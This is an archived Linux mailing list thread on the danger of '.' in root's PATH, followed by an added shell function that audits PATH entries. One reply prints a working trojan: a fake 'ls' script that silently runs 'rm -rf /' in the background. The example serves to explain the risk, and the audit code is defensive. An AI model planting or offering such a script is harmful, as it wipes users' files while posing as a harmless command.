ok, thanks for the info. I never really thought of it like that, someone else
running as root. Even though they would never get my password, I guess there are
other ways of becoming root. Thanks again.
jake
On Mon, 31 Jul 2000, Charles Galpin wrote:
--I didn't see anyone answer this, so I'll give it a stab.
--
--It protects you against trojans. The beauty of the unix security model is
--that a 'regular' user can't do much wrong to the system, only to
--themselves. However if you can get root to run something malicious (like
--"rm -rf /") then you can really cause some damage.
--
--If root has "." in their path, then programs in the current directory may
--be found and run. If it's at the end of the path then the risk is much
--less, but still there.
--
-- *** DO NOT TRY THIS **
--A trivial example of a trojan would be creating a file called 'ls' in /tmp
--with the following contents
--
--#!/bin/sh
--rm -rf / >& /dev/null&
--/bin/ls
--
--If this were made executable and someone with "." in their path before
--/bin ran this, you might have a lot of files missing before you realize
--it (since it does indeed do a ls as well). If it were root, then you would
--lose all your files..
--
--I hope this has been a clear enough description to scare the hell out of
--you and remove "." from your regular accounts as well. Sadly enough you
--won't (like me) and probably have rm aliased to 'rm -f' even though it's
--bitten you in the ass several times already. Hey, that's what backups are
--for right? Of course I am nowhere near that casual with my root accounts.
--
--charles
--
--On Fri, 28 Jul 2000, Steve Arnold wrote:
--
--> Jake McHenry wrote:
-->
--> > What is such a security error with what I said? I've never done what I said, but
--> > about the same thing. I have root's login disabled, so I have to su to root. I
--> > have the . at the end of my user's path, and when I su to root, it keeps my
--> > paths, including the ., so I always can run the program in the current
--> > directory. I only su to root when I need to, don't use it for everything, hence
--> > why I did it this way. I've always done this. Can someone please explain to me
--> > why it is such a security problem? And sorry to the person that I told this to,
--> > if I realized this was a mistake, I wouldn't have told him to do that.
-->
--> I'd like to hear a good answer on this one, too. Although I do the
--> "./blah" thing for messing around with stuff in the current directory,
--> I'm not sure what the big deal is. Is it just the possibility of
--> running something un-intended as root that's the big danger here?
-->
--> Don't leave us dangling...
-->
--> Steve
-->
-->
-->
--> --
--> To unsubscribe: mail [EMAIL PROTECTED] with "unsubscribe"
--> as the Subject.
-->
Jake McHenry
[EMAIL PROTECTED]
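
A defensive check for the problem discussed in this thread, added here as an example and not part of any poster's message: a POSIX shell function that flags PATH entries which resolve to the current directory (`.`, empty entries, relative paths) or to a directory any user can write to. The function name `audit_path` and the sample PATH are constructed for illustration.

```shell
#!/bin/sh
# Added example: audit a PATH string for entries that let a file planted in
# the current directory (or in a directory anyone can write to) shadow a real
# command such as ls.

# audit_path PATHSTRING
# Prints one finding per risky entry; returns 0 if clean, 1 otherwise.
audit_path() {
    ap_rest="$1:"      # trailing ':' so a final empty entry is still seen
    ap_pos=0
    ap_bad=0
    while [ -n "$ap_rest" ]; do
        ap_entry=${ap_rest%%:*}
        ap_rest=${ap_rest#*:}
        ap_pos=$((ap_pos + 1))
        case $ap_entry in
            '')
                echo "entry $ap_pos: empty entry (treated as current directory)"
                ap_bad=1 ;;
            .)
                echo "entry $ap_pos: '.' (current directory)"
                ap_bad=1 ;;
            /*)
                # Absolute path: flag it if "other" has write permission.
                ap_mode=$(ls -ldL "$ap_entry" 2>/dev/null) || continue
                case $ap_mode in
                    d???????w*)
                        echo "entry $ap_pos: $ap_entry is world-writable"
                        ap_bad=1 ;;
                esac ;;
            *)
                echo "entry $ap_pos: relative path '$ap_entry'"
                ap_bad=1 ;;
        esac
    done
    return "$ap_bad"
}

# Constructed sample: '.' at the end, as in the thread, plus an empty entry.
SAMPLE_PATH="/usr/local/bin:/usr/bin::/bin:."
audit_path "$SAMPLE_PATH" || echo "PATH needs cleaning before use as root"
```

Calling `audit_path "$PATH"` in the shell you get after `su` checks the PATH that root actually runs with, which matters when `su` keeps the user's PATH as described above.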